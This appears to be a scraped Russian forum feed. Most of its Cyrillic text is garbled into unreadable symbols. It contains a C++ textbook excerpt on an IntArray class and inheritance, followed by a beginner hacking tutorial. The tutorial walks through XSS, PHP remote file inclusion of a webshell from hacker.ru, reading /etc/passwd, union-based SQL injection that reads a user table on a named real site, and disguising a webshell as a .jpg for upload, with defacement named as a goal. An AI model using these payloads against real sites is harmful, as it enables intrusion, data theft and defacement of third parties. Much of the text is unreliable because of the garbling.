�� Farounaga

Anekdotes

mybb@mybb.ru (Farounaga) — Mon, 13 Jun 2011 12:44:47 +0400

C++

mybb@mybb.ru (Farounaga) — Mon, 04 Apr 2011 10:25:54 +0400

2.3. �� 

� �� , �� ++. �� int. �� .

�� , �� , �� . ��, �� , �� . �� , �� :

�� . �� ;
�� ;
�� , ��: �� ; �� ; �� , �� , �� ;
�� . �� , ��-�� : �� -�� .
��, �� , � ��:�� . (�� , �� .)
�� .
�� . �� .
�� . �� , �� , �� ++.
��, �� , �� . �� ++? � �� :

class classname {
public:
// ��
private:
// �� , ��
};
class, public � private � �� ++, � classname � ��, �� . �� IntArray: �� . �� , �� Array.
�� , �� . �� , �� . �� , �� :

// �� IntArray
IntArray myArray;

// �� IntArrayIntArray *pArray = new IntArray;
�� : �� (��, �� class) � ��, �� . �� .

// �� IntArray
// ��
class IntArray;
�� public, private � protected. (�� protected.) �� , �� , �� , � ��, �� , �� . ��, �� , �� -�� , ��-��, �� . �� IntArray:

class IntArray {
public:
// �� : #2b
bool operator== (const IntArray&) const;
bool operator!= (const IntArray&) const;
// �� : #2a IntArray& operator= (const IntArray&);
int size() const; // #1 void sort(); // #4
int min() const; // #3a int max() const; // #3b
// �� find �� // �� // �� -1, ��
int find (int value) const; // #3c
private: // �� , // �� ...}
��, �� , �� , �� . �� const, �� , �� . �� , �� .
�� -�� (��, min()) �� . �� , �� (.), �� , �� (->) � � �� . ��, �� , �� IntArray, �� :

// �� min_val
// �� myArray
int min_val = myArray.min();
�� IntArray, �� :

int min_val = pArray->min();
(��, �� , �� . �� -��, �� . �� .)
�� , �� . �� IntArray:

IntArray my�rray0, myArray1;
�� :

// �� -
// �� -�� myArray0.operator=(myArray1)
myArray0 = myArray1;
// �� -
// �� -�� myArray0.operator==(myArray1)
if (myArray0 == myArray1)
cout << "��! �� !\n";
�� public � private �� . � �� , �� public, �� , � � ��, �� private, �� -�� . (�� -��, �� -�� , �� 15.2.)
� �� , �� , �� . �� .
�� , �� . �� , �� . � �� , �� :

�� , �� , �� , �� , �� : �� (�� 6.18);
�� , �� , �� , � �� , �� .
�� IntArray? �� -�� . �� , �� . �� . �� -��:

class IntArray {
public:
// ...
int size() const { return _size; }
private:
// �� -��
int _size;
int *ia;
};
�� _size � �� , �� . �� , �� -�� size(), �� _size. �� _size, �� -�� size() �� . �� .
�� , �� , �� . �� (��, �� _size �� public):

IntArray array;
int array_size = array.size();
array_size = array._size;
��, �� , �� , �� . �� , �� ?
�� , ��. �++ �� (inline) ��. �� , �� . (�� , �� , � �� ++. �� , � �� .) �� . �� :

for (int index=0; index<array.size(); ++index)
// ...
�� size() �� _size �� . �� , � �� , �� :

for (int index=0; index<array._size; ++index)
// ...
�� (�� ), �� . �� inline, �� .
�� , �� .
�� (�� ) �� , �� . �� , �++ �� .
�� -��, �� . �� , �� .
��-�� , �� , �� , �� . (�� , �� -�� -��.) �� , �� . �� : �� ?
� �++ �� . �� , �� /�� . �� . �� , �� , �� . �� , �� . �� . �� min(). (�� , �� -��.)

// �� min()
// ��
#include <string>
int min (const int *pia,int size);
int min (int, int);
int min (const char *str);
char min (string);
string min (string,string);
�� . �� . (� �� 9 �� .)
��, �� IntArray. �� :

class IntArray {
public:
explicit IntArray (int sz = DefaultArraySize);
IntArray (int *array, int array_size);
IntArray (const IntArray &rhs);
// ...
private:
static const int DefaultArraySize = 12;
}
��

IntArray (int sz = DefaultArraySize);
�� , �� . (�� explicit.) �� int, ��

IntArray array1(1024);
�� 1024 �� . �� , ��:
IntArray array2;
�� DefaultArraySize. (�� static � �� DefaultArraySize: �� 13.5. �� , �� .)
�� :

IntArray::IntArray (int sz)
{
// ��
_size = sz;
ia = new int[_size];
// �� for (int ix=0; ix<_size; ++ix) ia[ix] = 0;}
�� . �� , �� . �� ? ��-��, �� new �� : � �� . (� �� 2.6 �� , �� .) � ��-��, �� sz ��-�� , �� .
�� ? �� , � �� (::):

IntArray::IntArray(int sz);
�� , �� -�� (� �� ) �� . �� , �� IntArray, �� . (�� 8; �� 13.9.)
�� IntArray �� IntArray �� . �� : �� . �� IntArray � �� :

int ia[10] = {0,1,2,3,4,5,6,7,8,9};
IntArray iA3(ia,10);
�� . (�� , �� .)

IntArray::IntArray (int *array, int sz)
{
// ��
_size = sz;
ia = new int[_size];
// �� for (int ix=0; ix<_size; ++ix) ia[ix] = array[ix];}
�� . �� IntArray �� IntArray. �� :

IntArray array;
// �� :IntArray ia1 = array;IntArray ia2 (array);
�� IntArray, ��-�� :

IntArray::IntArray (const IntArray &rhs )
{
// ��
_size = rhs._size;
ia = new int[_size];
// �� for (int ix=0; ix<_size; ++ix) ia[ix] = rhs.ia[ix];}
� �� , �� &. �� : �� . �� : �� , �� , �� , � �� ; ��, �� rhs._size, � �� rhs->_size. (�� 3.6.)
��, �� . �� , �� . �� , � �� . �� , �� init():

class IntArray {
public:
explicit IntArray (int sz = DefaultArraySize);
IntArray (int *array, int array_size);
IntArray (const IntArray &rhs);
// ...
private:
void init (int sz,int *array);
// ...
};
// ��, ��
void IntArray::init (int sz,int *array){ _size = sz; ia = new int[_size];
for (int ix=0; ix<_size; ++ix)
if ( !array ) ia[ix] = 0; else ix[ix] = array[ix];}
// �� IntArray::IntArray (int sz) { init(sz,0); }IntArray::IntArray (int *array, int array_size) { init (array_size,array); }IntArray::IntArray (const IntArray &rhs) { init (rhs._size,rhs.ia); }
�� -�� , �� , �� . �� , �� (~). �� , �� . �� , �� . � �� IntArray �� -�� , �� . (�� 14.) �� IntArray:

class IntArray {
public:
// ��
explicit IntArray (int sz = DefaultArraySize);
IntArray (int *array, int array_size);
IntArray (const IntArray &rhs);
// �� ~IntArray() { delete[] ia; } // ...private: // ...};
�� IntArray. �� , �� IntArray �� , �� , � �� :

IntArray array;
int last_pos = array.size()-1;
int temp = array[0];
array[0] = array[last_pos];
array[last_pos] = temp;
�� . �� , �� :

#include <cassert>
int& IntArray::operator[] (int index){ assert (index >= 0 && index < _size); return ia[index];}
�� , �� , ��, �� /��. �� , �� , �� , �� . � ��, �� . ��, �� . (�� 15, � � �� 3.15 �� .)
�� , �� , �� , ��-�� , �� . �� IntArray �� IntArray.h. �� , � �� IntArray, �� #include.
�� -�� , �� , �� , �� ++ ��. �� .� (��, �� ++ ��) � �� IntArray.C.

�� 2.5
�� ++ �� . �� (��), �� ; �� , �� . �� , �� . �� , �� , � �� , �� . �� (�� ):
(a) ��
(b) ��
(c) ��
(d) ��
(e) ��
(f) ��

�� 2.6
�� , �� , �� . �� ? ��, �� : �� , � �� . �� , � �� , �� -�� .

�� 2.7
� �� . �� , �� . �� ? �� ? �� ?

2.4. ��-�� 

�� . �� , �� , � �� , �� , �� . �� , �� IntArray ��, �� , �� min(), max(), find(), �� . �� , �� .
�� . �� , �� ? �� ?
� �� : �� . �� , �� , � �� . �� , � ��, �� . �� , �� , �� .
��, �� , �� , �� , �� IntArray. �� , �� , �� . ��, �� , �� :

// ��
class IntArray { ... };
// �� class IntArrayRC { ... };
// �� class IntSortedArray { ... };
�� :

�� , �� . �� . �� , �� , �� , �� ;
�� -�� , �� , �� :
void process_array (IntArray&);
void process_array (IntArrayRC&);
void process_array (IntSortedArray&);
�� . �� , �� , �� , �� , ��, �� .
�� -�� . �� . �� (��, IntArrayRC �� IntArray), �� -��, �� -��. �� IntArrayRC �� , �� IntArray, � �� , �� .
� �++ ��, �� , �� , � ��-�� , �� . �� , �� (�.�. �� -�� ). ��, ��, �� , �� , � �� , � �� . � �� . �� . �� swap(), �� . �� IntArray:

#include <IntArray.h>
void swap (IntArray &ia, int i, int j)
{ int temp ia[i]; ia[i] = ia[j]; ia[j] = temp;}
// �� swap:IntArray ia;IntArrayRC iarc;IntSortedArray ias;// �� - ia �� IntArrayswap (ia,0,10);
// �� - iarc �� IntArrayswap (iarc,0,10);
// �� - ias �� IntArrayswap (ias,0,10);
// �� - string �� IntArraystring str("�� IntArray!");swap (str,0,10);
�� -��. �� , �� swap() �� . ��, �� swap() �� IntArrayRC:

swap (iarc,0,10);
�� IntArrayRC, � ��

swap (ias,0,10);
�� IntSortedArray. �� ++.
�� IntArray �� . �� ? �� . ��, �� . �� , �� , �� , �� virtual. �� , �� .
�� (��, �� ), �� . �� (public) � �� (private).
�� , �� , ��. �� , �� , � �� -��, �� . � �� , �� -�� . � �� , � �� , � �� (protected). �� , �� , �� -��, �� . (�� .)
�� IntArray:

class IntArray {
public:
// ��
explicit IntArray (int sz = DefaultArraySize);
IntArray (int *array, int array_size);
IntArray (const IntArray &rhs);
// �� virtual ~IntArray() { delete[] ia; }
// �� : bool operator== (const IntArray&) const; bool operator!= (const IntArray&) const;
// �� : IntArray& operator= (const IntArray&); int size() const { return _size; };
// �� ... virtual int& operator[](int index) { return ia[index]; } virtual void sort();
virtual int min() const; virtual int max() const; virtual int find (int value) const;
protected: static const int DefaultArraySize = 12; void init (int sz; int *array);
int _size; int *ia;}
�� -�� -�� , �� . �� , �� .
�� , �� , �� , �� . �� IntArray �� .
�� , �� -�� . �� . �� , �� IntArrayRC. �� size() �� , ��, �� .
�� . �� , �� . �� (�� ) �� , �� . �� :

void init (IntArray &ia)
{
for (int ix=0; ix<ia.size(); ++ix)
ia[ix] = ix;
}
�� ia �� IntArray, IntArrayRC �� IntSortedArray. ��-�� size() �� . � �� , �� , �� ia, � �� .
(� �� 17 �� . �� , �� .)
�� IntArrayRC:

#ifndef IntArrayRC_H
#define IntArrayRC_H

#include "IntArray.h"
class IntArrayRC : public IntArray {public: IntArrayRC( int sz = DefaultArraySize ); IntArrayRC( const int *array, int array_size ); IntArrayRC( const IntArrayRC &rhs );
virtual int& operator[]( int ) const;
private: void check_range( int ix );};
#endif
�� IntArrayRC.h. �� , �� IntArray.h.
� �� IntArrayRC �� , �� IntArray: �� IntArrayRC �� ; �� .
�� -�� IntArray �� IntArrayRC ��, �� . � �� . ��

class IntArrayRC : public IntArray
�� , �� IntArrayRC �� IntArray, �� , �� . �� public � �� , �� , �� . �� IntArrayRC �� IntArray, ��, ��, � �� swap(). �� , �� IntArrayRC � �� IntArray.
�� :

IntArrayRC::operator[]( int index )
{
check_range( index );
return _ia[ index ];
}
� �� check_range():

#include <cassert>
inline void IntArrayRC::check_range(int index)
{ assert (index>=0 && index < _size);}
(�� assert() � �� 1.3.)
�� , � �� ? �� , �� -�� -�� , �� , � �� assert(), �� .
� �� ? �� , �� , �� . �� , �� , �� , �� .
�� , �� IntArrayRC �� , �� . �� , �� ? �� .
�� , �� , �� ++. �� , �� . �� . �� IntArrayRC �� :

int ia[] = {0,1,1,2,3,5,8,13};
IntArrayRC iarc(ia,8);
�� ia � 8 �� IntArray. �� . �� IntArrayRC:

inline IntArrayRC::IntArrayRC( int sz )
: IntArray( sz ) {}
inline IntArrayRC::IntArrayRC( const int *iar, int sz ) : IntArray( iar, sz ) {}
(�� 14 � 17. �� , �� IntArrayRC.)
�� , �� , �� . �� , �� , �� . �� , �� . �� IntArrayRC, �� . �� , �� , � �� , �� , � �� : �� , �� . �� , �� IntArrayRC, �� .
�� IntArrayRC � �� IntArrayRC.h. �� , �� IntArrayRC.C �� .
�� , �� IntArray � IntArrayRC:

#include <iostream>
#include "IntArray.h"
#include "IntArrayRC.h"
void swap( IntArray &ia, int ix, int jx ){ int tmp = ia[ ix ]; ia[ ix ] = ia[ jx ]; ia[ jx ] = tmp;}
int main(){ int array[ 4 ] = { 0, 1, 2, 3 }; IntArray ia1( array, 4 ); IntArrayRC ia2( array, 4 );
// ��: �� size-1 // �� IntArray cout << "swap() with IntArray ia1" << endl; swap( ia1, 1, ia1.size() );
// ��: �� IntArrayRC "��" �� cout << "swap() with IntArrayRC ia2" << endl; swap( ia2, 1, ia2.size() ); return 0;}
�� :

swap() with IntArray ia1
swap() with IntArrayRC ia2
Assertion failed: ix >= 0 && ix < _size,
file IntArrayRC.h, line 19
�� 2.8
�� . ��, �� IntArrayRC �� IntArray, �� , �� .�. �� ?
(a) ��-��
(b) ��-��
(c) �� -��
(d) ��
(e) ��
(f) ��
(g) ��
(h) ��
(i) ��

�� 2.9
��, �� , �� , �� :

(a) rotate();
(b) print();
(c) size();
(d) DateBorrowed(); // ��
(e) rewind();
(f) borrower(); // ��
(g) is_late(); // ��
(h) is_on_loan(); // ��
�� 2.10
�� , �� . �� , �� . �� , �� . � �� ?

�� 2.11
�� . �� , �� , �� , �� -�� , �� , �� . � �� , �� , � �� . �� ?

�� 2.12
�� , ��, ��, �� , ��, ��. �� . �� , �� . �� . �� , �� .

(a) ��
(b) ��
(c) ��
(d) ��_��
(e) ��_�_��
(f) ��_��

��

mybb@mybb.ru (Farounaga) — Mon, 28 Mar 2011 13:04:01 +0400

�� , � �� , �� .
�� .
�� . �� , �� . �� ,
�� (�� ), �� !
� �� "��" �� , �� ,
�� . �� , ��
��. � �� (�� :)), �� , ��
��, �� .

�� , �� - ��, �� , � �� . ��, ��
�� , � � �� , ��, �� . ��
�� , �� , �� . �� ,
�� .
��, �� .
�� . �� , �� . ��, �� . �� .
�� . �� , �� .
�� , � �� . �� , �� . �� .
�� . �� , �� .
�� - �� . �� !

�� . � ��
��, google - �� . �� -�� , �� , �� ,
�� , �� . �� , �� . �� 90% �� .
��, �� . �� .
�� , �� . ��
� �� - �� , �� .
� �� ?�
� �� , �.�. �� , �� . �� , �� .
�� , �� . �� . �� . �� , �� .

��.
�� ? �� .
�� , � ��
�� . �� :

�� 159. ��

�� 165. ��
��
�� 183. ��
�� , ��
��

�� 187. ��
��
��

�� 272. ��
��

�� 273. ��, ��
��
��

��

�� 137. ��
��

�� 138. �� ,
��, ��
��

�� 139. ��
��

��

�� 137. ��
��

�� 138. �� ,
�� , ��,
��

�� 183. ��
�� , ��
��

�� 272. ��
��

�� 273. ��, ��
�� .

�� . �� . � �� ip(��) �� .
�� , �� .
�� , �� . � �� .
�� - �� , �� .
�� . �� . �� .

�� , ��
�� CD � �� , �� , �� , �� .

�� .
�� , � �� , �� . ��-�� : �� - �� , � �� - �� - �� .
�� . �� , �� , �� . �� , ��
��, ��, �� 45 ��). ��
��, �� , �� , � �� , �� , �� .
�� , �� -�� . �� ,
�� . �� -�� :

��
�Delphi | �/C++ | Visual Basic
�HTML, XML, WML
�PHP | ASP | JSP | Perl
�SQL � �o��

�� , �� , �� . �� . ��
�� .

�� shareware-��, �� .
��. HTML, PHP, ASP, Perl, JavaScript, VBS, JSP, � �� - ��
"��-��". �� -��, �� HackZona �� PHP.
HTML - �� . �� "HyperText Markup Language" - "�� ". �.�. �� ,
� �� "��" ��, �� , �� . �� , ��
�� , �� : �� , � �� , � �� -�� .
�� , �� : ��, ��, ��. � ��
��, �� PHP, �� , �� , ��, �� , ��
�� .
�� , �� . �� -�� -��.

XML - �� , �� , �� HTML, ��, �� . WML - �� XML, �� wap-��.
PHP � Perl - �� -��.

CSS - �� . �� HTML, �� - ��
��, �� , ��, ��, � ��-�� . ��
�� css. �� , �� , �� , � ��. �� HackZona.ru,
�� , �� .

Delphi, �/C++/C#, Java, Visual Basic, QBasic, Dark Basic, Pascal, Fortran, etc. - �� "��" ��. ��, ��
� �� , �� *.exe . {+ �� php - �� +}

SQL - �� . ��, ��, �� SQL injection? �� . �� ,
�� , �� PHP-��. � �� SQL.

�� , �� , � �� . ��, �� , �� .
�� (�� ).
�� Windows.
�� windows �� unix, �� *nix (��).
�� :
Linux, BSD, Solaris.
�� , �� Linux, �� .

�� , �� :
��
��
��
��/��
��
��

�� .
��, �� , �� . �� . �� :

�� . � �� & �� ,
�� (�� )

�� (�� ;)) �� , � ��
�� , ��. �� . �� , �� , �� .

�� . �� - �� , �� , �� . � �� , ��, ��, � �.�. � �.�.
��, �� , �� . �� - ��-��. � 16 ��
�� , �� .

�� - �� , �� , � �� .
�� , � �� . ��, ��
�� , �� . �� , � ��, �� , ��
�� , �� -�� -��, �� , ��, � �� :
46655529 (�� ), � �� . ��(�� ) �� , �� -
��. ��: �� mail.ru �� ?

�� - �� , �� - �� . ��
�� .

��, ��-�� , �� . �� , ��
� �� . �� .

�� - �� .

��, �� . �� , � �� .
� �� , �� , �� , �� IP,��,proxy � �.�.

��
�� "HTML.�� ". �� HTML �� . �� , �
�� , ��. �� .
�� PHP �� PHP � ��.
�� (linux) �� Linux�
�� google.

�� .

��: �� , �� . �� .

�� ?
�� -��.
�� . �� , �� , �� .
�� .
�� :

�� && ��. ��
�� - �� (��). ��
�� .

�� .
�� - �� , �� .
�.�. �� .
�� ? �� .
�� . �� . �� .
�� CMS, � �� .
�� - �� - �� . ��, �� CMS php nuke 7.0.
�� :
site: php nuke 7.0 - �� CMS Nuke
�� . �� .
�� , �� . � �� . �� , � �� .

�� ? �� xss sql injection php include
� �� .
�� .

XSS.
�� - �� Cookes ��.
��, �� Xss
�� -��
�� :
http://www.atlant.ws �� . �� html ��

� �� (� HTML �� )
� �� :
http://www.atlant.ws/?set=search&ww … amp;query=

�� GET ��.
�� . �� javascript ��.
http://www.atlant.ws/?set=search&ww … amp;query=[script]alert('xss')[/script]
��. �� . �� . �.�. � javascript �� alert() �� .
�� xss. �� . � �� (q)
�� xss �� .
�� :
http://www.addtop.ru/kom.php?id=32
��
[script]alert('xss')[/script]
� �� .
�� . �� , �� .
�� ? � �� . �.�. �� , �� .
� � �� , �� , � �� .
�� xss ��. �� . �� xss.
�� , �� Cookes. � �� , �� . � ��.
� �� .

�� PHP include.
�� .
�� , �� .
�� php ��. C �� .
� ��, �� . �� .
�� ? PHP include �� . ��, ��

�� url:
wwwsite.ru?page=home.html
�� , �� home.html
� �� ? ��, ��:
wwwsite.ru?page=http:/hacker.ru/webshell.php
�� .
�� webshell.php �� . � �� , �� .
�� . �� .
�� , �� .
� �� .
��, �� :
wwwsite.ru?page=/etc/passwd
��, �� php include. �� google:
Inurl:page=
�� , � �� "page=�. �� page. �� , ��
�� php ��, �� xss �� :
wwwsite.ru?page=[script]alert(/xss/)[/script]
�� .
� �� : �� php include, �� null byte � �� .

�� SQL Injection
�� . �� , �� . �� .
�� sql injection. �� . � ��
�� my sql. �� . �� mssql, oracle. �� -��. �� mysql. �� , �� . ��:
http://www.descom.ch/main.php?id=18646644
�� sql injection ��
http://www.descom.ch/main.php?id=18646644' ��
�� . �� mysql.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/www/web137/html/descom/include/queries.inc.php on line 19

�� -�� (�.�. �� ) �� order by.
http://www.descom.ch/main.php?id=186466 … er+by+10/*
�� , ��
http://www.descom.ch/main.php?id=18646644+order+by+7/*
��. �� . �� 7.
�� . http://www.descom.ch/main.php?id=186466 … ,4,5,6,7/*
��: 4,5. �� union select
� �� . �� .
http://www.descom.ch/main.php?id=186466 … ,3,version(),5,6,7/*
�� mysql v5 - - � �� , �� .
�� :
http://www.descom.ch/main.php?id=186466 … ,3,version(),5,6,7/+from+��/*
�� . �� user �� users. ��
��
� �� , �� user.
�� . �� .
��:
http://www.descom.ch/main.php?id=186466 … rom+user/*
� � �� .
�� .
�� xss:
http://www.descom.ch/main.php?id=186466 … ect+1,2,3,[script]alert(/xss/)[/script],5,6,7/*

��, �� . � �� , � �� , �� . � ��
� �� , �� . �� php � mysql
�� http://vzlom.ixbb.ru:

�� .
�� . �� , �� php include. ��
�� . �� ? �� . �� . �� .
�� . �� webshell.php �� . �� :
�� :
webshell.php.jpg.
� �� .
�� , �� , �� . �.� ��
�� :
�� php ��.

��, �� .
�� , �� :
��- �� . �� "Hacked by ��"
CMS �� -�� - �� .
�� - �� -exploit-xploit - �� . �� , ��
Cookes � �� , �� :
�� ;
�� ;
�� ;
�� .
�� , �� .
� �� Cookes � �� xss
bugtraq-�� - �� CMS �� .
Google hacking - �� - �� google �� .

��
�� 2 ��. �� xss php include � sql injection. �� . � � �� .
�� :
xss
sql injection
php include

� ��
��
�� . �� . ��!
ps �� [ � ]

����� Farounaga

Anekdotes

C++

���� � ������

�� Farounaga

��